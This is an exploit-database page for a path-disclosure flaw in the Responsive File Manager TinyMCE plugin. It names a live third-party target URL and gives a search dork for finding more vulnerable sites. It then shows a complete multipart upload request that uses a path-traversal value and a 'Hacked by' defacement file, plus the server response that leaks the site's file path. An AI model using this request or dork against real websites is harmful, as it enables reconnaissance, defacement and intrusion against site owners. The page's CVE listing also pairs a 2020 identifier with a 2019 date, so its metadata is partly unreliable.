Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-25213 | CWE-200 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2019-11-06 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H | 0.032715 | 0.626 |
Live Target: http://pfionline.co.in/assets/tinymce/filemanager/dialog.php Author: L4663r666h05t In this case, you need Burpsuite. Note: if burpsuite is usually used to intercept, then here I am just trying to make it wrong directory then the response form will appear in the path of the victim's website using responsive file manager. Dork: inurl:/filemanager/css/ Exploit: /filemanager/dialog.php Step One: https://pasteboard.co/IFjDTTA.jpg Step Two: https://pasteboard.co/IFjE8h2.jpg Last Step: https://pasteboard.co/IFjEk2R.jpg REQUEST: POST /assets/tinymce/filemanager/upload.php HTTP/1.1 Host: user.com Content-Length: 439 Accept: application/json Cache-Control: no-cache Origin: http://user.com/ X-Requested-With: XMLHttpRequest User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC Referer: http://user.com/assets/tinymce/filemanager/dialog.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac Connection: close ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path" ../../../blablabla ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path_thumb" ../thumbs/ ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="file"; filename="world.txt" Content-Type: text/plain Hacked by L4663r666h05t ------WebKitFormBoundaryWwXMWsA3nGDOf2uC-- RESPONSE: HTTP/1.1 200 OK Date: Tue, 05 Nov 2019 18:26:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 84 Content-Type: text/html; charset=UTF-8 wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53) Path Leaked: /home/user/public_html/ Thanks to: Indonesian Code Party - Exploiter.ID
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.